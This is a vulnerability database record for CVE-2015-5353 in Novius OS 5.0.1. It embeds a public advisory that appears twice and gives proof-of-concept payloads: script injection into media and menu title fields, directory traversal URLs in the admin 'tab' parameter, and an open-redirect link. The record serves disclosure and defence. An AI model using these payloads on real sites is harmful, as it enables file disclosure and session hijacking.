ID CVE-2015-5353 Type cve Reporter NVD Modified 2016-12-07T13:16:36
Description
Directory traversal vulnerability in Novius OS 5.0.1 (Elche) allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the tab parameter to admin/.
{"packetstorm": [{"lastseen": "2016-12-05T22:19:15", "references": [], "edition": 1, "description": "", "reporter": "hyp3rlinx", "published": "2015-06-29T00:00:00", "type": "packetstorm", "title": "Novius OS 5.0.1-elche XSS / LFI / Open Redirect", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2015-5354", "CVE-2015-5353"], "modified": "2015-06-29T00:00:00", "href": "https://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html", "id": "PACKETSTORM:132478", "sourceData": "`[+] Credits: John Page ( hyp3rlinx ) \n \n[+] Domains: hyp3rlinx.altervista.org \n \n[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-NOVIUSOS0629.txt \n \n \n \nVendor: \n======================= \ncommunity.novius-os.org \n \n \nProduct: \n=============================================================== \nnovius-os.5.0.1-elche is a PHP Based Content Management System \ncommunity.novius-os.org/developpers/download.html \n \n \n \nAdvisory Information: \n=================================== \nPersistent XSS, LFI & Open Redirect \n \n \n \nVulnerability Details: \n====================== \n \nPersistent XSS: \n--------------- \nUsers can inject XSS payloads that will be saved to MySQL DB, where they \nwill execute each time when accessed. \n \n1- In Admin under 'Media Center' users can inject XSS payloads and save to \nthe 'media_title' field for a saved media file, \ncreate a new media page inject payload click save and then select \nvisualize. \n \n2- Under Website menus area users can inject XSS payloads and save for the \n'menu_title' field for a Website menu. \n \nIf we view browser source code at \nhttp://localhost/novius-os.5.0.1-elche/novius-os/?_preview \nthe XSS is output to its HTML entities. \n \ne.g. \n<title><script>alert('HELL')</script></title> \n \nBut within the same webpage for <h1> tag you can see it is not. \n \ne.g. \n<div id=\"block-grid\" class=\" customisable col-md-12 col-sm-12 col-xs-12 \nmain_wysiwyg\"><h1 id=\"pagename\"><script>alert('HELL')</script></h1> \n \n \nLocal File Inclusion: \n--------------------- \nWe can directory traverse access and read files outside of the current \nworking directory in the Admin area by abusing the 'tab' parameter. \nhttp://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=../../../../ \n \n \n \nOpen Redirect: \n-------------- \nhttp://localhost/novius-os.5.0.1-elche/novius-os/admin/nos/login?redirect= \nis open to abuse by supplying an malicious a location or file. \n \n \n \nXSS Exploit code(s): \n==================== \nIn 'Media Center' create a new media file, click edit and inject XSS \npayload for the 'title' field click save and then select visualize. \nhttp://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=admin/noviusos_media/media/insert_update/1 \n \nvulnerable parameter: \nmedia_title \n \nIn 'Website Menu' create a new website menu item and inject XSS payload \nclick save and then select visualize. \nhttp://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=admin/noviusos_menu/menu/crud/insert_update%3Fcontext%3Dmain%253A%253Aen_GB \nhttp://localhost/novius-os.5.0.1-elche/novius-os/?_preview=1 \n \nvulnerable parameter: \nmenu_title \n \n \n \nLFI: \n---- \nhttp://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=../../../SENSITIVE-FILE.txt \n \nhttp://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=../../../../xampp/phpinfo.php \n \n \n \nOpen Redirect: \n-------------- \nhttp://localhost/novius-os.5.0.1-elche/novius-os/admin/nos/login?redirect=http://www.SATANSBRONZEBABYSHOES.com \n \n \n \nDisclosure Timeline: \n====================================== \nVendor Notification: NA \nJune 29, 2015 : Public Disclosure \n \n \n \nSeverity Level: \n================= \nMed \n \n \n \nDescription: \n================================================================================= \n \nRequest Method(s): [+] GET & POST \n \n \nVulnerable Product: [+] novius-os.5.0.1-elche \n \n \nVulnerable Parameter(s): [+] media_title, menu_title, tab, redirect \n \n \nAffected Area(s): [+] Login, Web Pages, Media Center & Website \nMenu area \n \n \n================================================================================== \n \n[+] Disclaimer \nPermission is hereby granted for the redistribution of this advisory, \nprovided that \nit is not altered except by reformatting it, and that due credit is given. \nPermission is \nexplicitly given for insertion in vulnerability databases and similar, \nprovided that \ndue credit is given to the author. The author is not responsible for any \nmisuse of the \ninformation contained herein and prohibits any malicious use of all \nsecurity related \ninformation or exploits by the author or elsewhere. \n \n \n(hyp3rlinx) \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/132478/AS-NOVIUSOS0629.txt"}], "exploitdb": [{"lastseen": "2016-02-04T05:50:13", "osvdbidlist": ["123889", "123888", "123890"], "references": [], "description": "Novius 5.0.1 - Multiple Vulnerabilities. CVE-2015-5353,CVE-2015-5354. Webapps exploit for php platform", "edition": 1, "reporter": "hyp3rlinx", "published": "2015-06-30T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "exploitdb", "title": "Novius 5.0.1 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-5354", "CVE-2015-5353"], "modified": "2015-06-30T00:00:00", "id": "EDB-ID:37439", "href": "https://www.exploit-db.com/exploits/37439/", "sourceData": "[+] Credits: John Page ( hyp3rlinx )\r\n\r\n[+] Domains: hyp3rlinx.altervista.org\r\n\r\n[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-NOVIUSOS0629.txt\r\n\r\n\r\n\r\nVendor:\r\n=======================\r\ncommunity.novius-os.org\r\n\r\n\r\nProduct:\r\n===============================================================\r\nnovius-os.5.0.1-elche is a PHP Based Content Management System\r\ncommunity.novius-os.org/developpers/download.html\r\n\r\n\r\n\r\nAdvisory Information:\r\n===================================\r\nPersistent XSS, LFI & Open Redirect\r\n\r\n\r\n\r\nVulnerability Details:\r\n======================\r\n\r\nPersistent XSS:\r\n---------------\r\nUsers can inject XSS payloads that will be saved to MySQL DB, where they\r\nwill execute each time when accessed.\r\n\r\n1- In Admin under 'Media Center' users can inject XSS payloads and save to\r\nthe 'media_title' field for a saved media file,\r\n create a new media page inject payload click save and then select\r\nvisualize.\r\n\r\n2- Under Website menus area users can inject XSS payloads and save for the\r\n'menu_title' field for a Website menu.\r\n\r\nIf we view browser source code at\r\nhttp://localhost/novius-os.5.0.1-elche/novius-os/?_preview\r\nthe XSS is output to its HTML entities.\r\n\r\ne.g.\r\n<title><script>alert('HELL')</script></title>\r\n\r\nBut within the same webpage for <h1> tag you can see it is not.\r\n\r\ne.g.\r\n<div id=\"block-grid\" class=\" customisable col-md-12 col-sm-12 col-xs-12\r\nmain_wysiwyg\"><h1 id=\"pagename\"><script>alert('HELL')</script></h1>\r\n\r\n\r\nLocal File Inclusion:\r\n---------------------\r\nWe can directory traverse access and read files outside of the current\r\nworking directory in the Admin area by abusing the 'tab' parameter.\r\nhttp://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=../../../../\r\n\r\n\r\n\r\nOpen Redirect:\r\n--------------\r\nhttp://localhost/novius-os.5.0.1-elche/novius-os/admin/nos/login?redirect=\r\nis open to abuse by supplying an malicious a location or file.\r\n\r\n\r\n\r\nXSS Exploit code(s):\r\n====================\r\nIn 'Media Center' create a new media file, click edit and inject XSS\r\npayload for the 'title' field click save and then select visualize.\r\nhttp://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=admin/noviusos_media/media/insert_update/1\r\n\r\nvulnerable parameter:\r\nmedia_title\r\n\r\nIn 'Website Menu' create a new website menu item and inject XSS payload\r\nclick save and then select visualize.\r\nhttp://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=admin/noviusos_menu/menu/crud/insert_update%3Fcontext%3Dmain%253A%253Aen_GB\r\nhttp://localhost/novius-os.5.0.1-elche/novius-os/?_preview=1\r\n\r\nvulnerable parameter:\r\nmenu_title\r\n\r\n\r\n\r\nLFI:\r\n----\r\nhttp://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=../../../SENSITIVE-FILE.txt\r\n\r\nhttp://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=../../../../xampp/phpinfo.php\r\n\r\n\r\n\r\nOpen Redirect:\r\n--------------\r\nhttp://localhost/novius-os.5.0.1-elche/novius-os/admin/nos/login?redirect=http://www.SATANSBRONZEBABYSHOES.com\r\n\r\n\r\n\r\nDisclosure Timeline:\r\n======================================\r\nVendor Notification: NA\r\nJune 29, 2015 : Public Disclosure\r\n\r\n\r\n\r\nSeverity Level:\r\n=================\r\nMed\r\n\r\n\r\n\r\nDescription:\r\n================================================================================\r\n\r\nRequest Method(s): [+] GET & POST\r\n\r\n\r\nVulnerable Product: [+] novius-os.5.0.1-elche\r\n\r\n\r\nVulnerable Parameter(s): [+] media_title, menu_title, tab, redirect\r\n\r\n\r\nAffected Area(s): [+] Login, Web Pages, Media Center & Website\r\nMenu area\r\n\r\n\r\n=================================================================================\r\n\r\n[+] Disclaimer\r\nPermission is hereby granted for the redistribution of this advisory,\r\nprovided that\r\nit is not altered except by reformatting it, and that due credit is given.\r\nPermission is\r\nexplicitly given for insertion in vulnerability databases and similar,\r\nprovided that\r\ndue credit is given to the author. The author is not responsible for any\r\nmisuse of the\r\ninformation contained herein and prohibits any malicious use of all\r\nsecurity related\r\ninformation or exploits by the author or elsewhere.\r\n\r\n\r\n(hyp3rlinx)\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/37439/"}]}
